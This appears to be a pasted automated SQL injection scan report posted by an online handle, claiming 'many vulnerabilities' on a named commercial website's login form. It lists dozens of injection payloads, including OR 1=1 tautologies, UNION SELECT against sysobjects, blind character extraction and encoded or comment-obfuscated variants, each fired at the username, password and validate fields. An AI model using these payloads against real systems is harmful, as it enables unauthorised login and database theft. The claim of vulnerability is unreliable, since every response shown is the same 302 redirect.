http://www.godaddy.com/ many vulnerabilities found by: @AnonymousOwn3r http://twitter.com/AnonymousOwn3r SQL Injection String Tests Summary (43860 results recorded) Failures: 51 Warnings: 0 Passes: 43809 SQL Injection String Test Results loginname Submitted Form State: password: validate: 1 Results: Server Status Code: 302 Found Tested value: %31%27%20%4F%52%20%27%31%27%3D%27%31 Server Status Code: 302 Found Tested value: 1 UNI/**/ON SELECT ALL FROM WHERE Server Status Code: 302 Found Tested value: 1' OR '1'='1 Server Status Code: 302 Found Tested value: 1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' -- Server Status Code: 302 Found Tested value: 1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116 Server Status Code: 302 Found Tested value: 1' OR '1'='1 Server Status Code: 302 Found Tested value: ' OR username IS NOT NULL OR username = ' Server Status Code: 302 Found Tested value: 1' AND non_existant_table = '1 Server Status Code: 302 Found Tested value: 1'1 Server Status Code: 302 Found Tested value: '; DESC users; -- Server Status Code: 302 Found Tested value: 1 AND USER_NAME() = 'dbo' Server Status Code: 302 Found Tested value: 1' AND 1=(SELECT COUNT(*) FROM tablenames); -- Server Status Code: 302 Found Tested value: 1 AND 1=1 Server Status Code: 302 Found Tested value: 1 EXEC XP_ Server Status Code: 302 Found Tested value: 1'1 Server Status Code: 302 Found Tested value: 1' OR '1'='1 Server Status Code: 302 Found Tested value: 1 OR 1=1 password Submitted Form State: loginname: validate: 1 Results: Server Status Code: 302 Found Tested value: 1' OR '1'='1 Server Status Code: 302 Found Tested value: 1' OR '1'='1 Server Status Code: 302 Found Tested value: %31%27%20%4F%52%20%27%31%27%3D%27%31 Server Status Code: 302 Found Tested value: 1 UNI/**/ON SELECT ALL FROM WHERE Server Status Code: 302 Found Tested value: 1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' -- Server Status Code: 302 Found Tested value: 1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116 Server Status Code: 302 Found Tested value: ' OR username IS NOT NULL OR username = ' Server Status Code: 302 Found Tested value: 1' AND non_existant_table = '1 Server Status Code: 302 Found Tested value: 1'1 Server Status Code: 302 Found Tested value: '; DESC users; -- Server Status Code: 302 Found Tested value: 1 AND USER_NAME() = 'dbo' Server Status Code: 302 Found Tested value: 1' AND 1=(SELECT COUNT(*) FROM tablenames); -- Server Status Code: 302 Found Tested value: 1 AND 1=1 Server Status Code: 302 Found Tested value: 1 EXEC XP_ Server Status Code: 302 Found Tested value: 1'1 Server Status Code: 302 Found Tested value: 1' OR '1'='1 Server Status Code: 302 Found Tested value: 1 OR 1=1 validate Submitted Form State: loginname: password: Results: Server Status Code: 302 Found Tested value: 1' OR '1'='1 Server Status Code: 302 Found Tested value: 1' OR '1'='1 Server Status Code: 302 Found Tested value: %31%27%20%4F%52%20%27%31%27%3D%27%31 Server Status Code: 302 Found Tested value: 1 UNI/**/ON SELECT ALL FROM WHERE Server Status Code: 302 Found Tested value: 1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' -- Server Status Code: 302 Found Tested value: 1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116 Server Status Code: 302 Found Tested value: ' OR username IS NOT NULL OR username = ' Server Status Code: 302 Found Tested value: 1' AND non_existant_table = '1 Server Status Code: 302 Found Tested value: 1'1 Server Status Code: 302 Found Tested value: '; DESC users; -- Server Status Code: 302 Found Tested value: 1 AND USER_NAME() = 'dbo' Server Status Code: 302 Found Tested value: 1' AND 1=(SELECT COUNT(*) FROM tablenames); -- Server Status Code: 302 Found Tested value: 1 AND 1=1 Server Status Code: 302 Found Tested value: 1 EXEC XP_ Server Status Code: 302 Found Tested value: 1'1 Server Status Code: 302 Found Tested value: 1' OR '1'='1 Server Status Code: 302 Found Tested value: 1 OR 1=1 http://www.godaddy.com/ many vulnerabilities found by: @AnonymousOwn3r http://twitter.com/AnonymousOwn3r